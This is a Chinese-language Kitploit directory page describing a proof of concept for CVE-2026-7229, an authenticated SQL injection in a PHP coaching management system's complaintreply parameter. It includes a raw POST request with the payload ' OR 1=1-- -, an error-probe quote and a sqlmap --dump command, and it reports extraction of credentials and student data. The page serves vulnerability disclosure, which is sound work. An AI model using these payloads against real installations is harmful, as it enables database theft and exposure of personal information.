Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

订阅源联系隐私© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-7229-SQLI — 概念验证:Coaching Management System 中的认证 SQL 注入,演示通过未净化的 complaintreply 参数进行数据库转储。 | Kitploit
工具/GitHubGitHub/xmyronn/cve-2026-7229-sqli
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试数据库安全
GitHubxmyronn/cve-2026-7229-sqli

CVE-2026-7229-SQLI

概念验证:Coaching Management System 中的认证 SQL 注入,演示通过未净化的 complaintreply 参数进行数据库转储。

查看仓库
135个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

教练管理系统中的已认证 SQL 注入漏洞可导致数据库转储

描述

PHP 版教练管理系统中存在一个 SQL 注入漏洞。管理员回复功能中的 complaintreply 参数在用于 SQL 查询之前未经过适当的清理。已认证的攻击者(管理员)可以注入恶意 SQL 查询,从而导致完整数据库提取。


漏洞详情

  • 类型: SQL 注入(CWE-89:SQL 命令中特殊元素的不当中和)
  • 影响: 数据库转储 / 凭据泄露
  • 受影响文件: /cims/modules/admin/reply.php
  • 受影响参数: complaintreply
  • 攻击向量: 远程,已认证(管理员)
  • 数据库: MySQL(MariaDB)

厂商

code-projects.org


产品

PHP 版教练管理系统 https://code-projects.org/coaching-management-system-in-php-with-source-code/


版本

未知(已在截至 2026 年 4 月的最新可用版本上测试)


概念验证(摘要)

  1. 学生提交投诉 Screenshot 2026-04-10 225755

  2. 管理员打开投诉并访问回复功能

POST /cims/modules/admin/reply.php?complaintid=18 HTTP/1.1 Host: 192.168.0.9 Content-Type: application/x-www-form-urlencoded

complaintreply=' OR 1=1-- -&submit=submit

Screenshot 2026-04-10 225808
  1. 通过 Burp Suite 拦截请求 Screenshot 2026-04-10 225821

  2. 注入载荷:

    '
    
Screenshot 2026-04-10 225844
观察到 SQL 错误

7. 确认注入:

' OR 1=1-- -
Screenshot 2026-04-10 225900
  1. 使用以下命令转储数据库:

    sqlmap -r sqli.txt --dump
    
Screenshot 2026-04-10 235219

已通过基于错误、基于布尔值以及使用 sqlmap 的自动化利用确认注入

影响

  • 可进行完整数据库提取
  • 以明文存储的凭据被泄露
  • 应用程序数据完全沦陷
  • 通过凭据提取实现身份验证绕过和权限提升
  • 已实现完整数据库转储,包括用户表(凭据)、 学生个人身份信息、教师记录和投诉历史。

严重性:严重

下载工具